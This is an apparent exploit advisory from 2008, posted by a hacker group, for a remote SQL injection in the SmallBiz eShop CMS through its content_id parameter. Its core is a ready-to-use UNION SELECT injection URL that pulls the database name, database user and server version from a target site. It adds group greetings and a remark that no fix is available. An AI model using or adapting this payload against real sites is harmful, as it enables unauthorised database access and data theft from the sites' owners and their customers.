SmallBiz eShop (content_id) Remote SQL Injection Vulnerability

2008-04-14 00:00:00

###################################################
[~] Powered by SmallBiz eShop CMS Remote Sql İnj. Vuln.

[~] Founder: Stack-Terrorist [v40] [ Moroc00 Hacker ]
[~] HomePage: http://www.v4-team.com
[~] Greatz : To all Hackerz from Moroc00 & All My Friends . . .
[~] Contact: [email protected]
[~] Exploit :
http://www.xxx.co.il/index.php?content_id=-20'%20union%20select%20convert(concat(database(),char(58),user(),char(58),version()),char)/*
---------------------
http://www.DZ-Secure.com
---------------------
###############################################

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.